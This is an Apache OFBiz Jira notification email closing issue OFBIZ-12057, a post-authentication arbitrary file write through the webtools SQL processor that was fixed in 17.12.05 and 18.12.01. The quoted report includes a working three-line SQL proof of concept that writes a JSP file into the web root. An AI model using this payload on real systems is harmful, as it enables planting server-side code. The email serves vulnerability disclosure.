You are viewing a plain text version of this content. The canonical link for it is here.

Posted to notifications@ofbiz.apache.org by "Jacques Le Roux (Jira)" <ji...@apache.org> on 2020/11/16 13:15:00 UTC

[jira] [Closed] (OFBIZ-12057) Prevent arbitary file write using webtools/control/EntitySQLProcessor.

     [ https://issues.apache.org/jira/browse/OFBIZ-12057?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Jacques Le Roux closed OFBIZ-12057.
-----------------------------------
    Fix Version/s: 17.12.05
                   18.12.01
       Resolution: Fixed

> Prevent arbitary file write using webtools/control/EntitySQLProcessor.
> ----------------------------------------------------------------------
>
>                 Key: OFBIZ-12057
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-12057
>             Project: OFBiz
>          Issue Type: Sub-task
>          Components: framework/webtools
>    Affects Versions: Trunk
>            Reporter: Jacques Le Roux
>            Assignee: Jacques Le Roux
>            Priority: Major
>             Fix For: 18.12.01, 17.12.05
>
>
> Shuibo Ye <sh...@gmail.com> reported a possible arbitary file write using webtools/control/EntitySQLProcessor.
> {quote}
> In the "SQL Command" part, I create a table and insert some strings and export the table to a file *one sentence at a time*.
> PoC:  CREATE TABLE "test"	(string VARCHAR(80))
>         INSERT INTO "test" (string) VALUES ('<%= system.getProperty("user.dir") %>')
>         call SYSCS_UTIL.SYSCS_EXPORT_TABLE(null,'test','.\framework\webtools\webapp\webtools\default.jsp',null,'*',null)
> After executing the three sentences,I successfully write the file and its url is https://localhost:8443/webtools/default.jsp.
> {quote}
> Note: this is a post-auth vuln., So we did not create a CVE



--
This message was sent by Atlassian Jira
(v8.3.4#803005)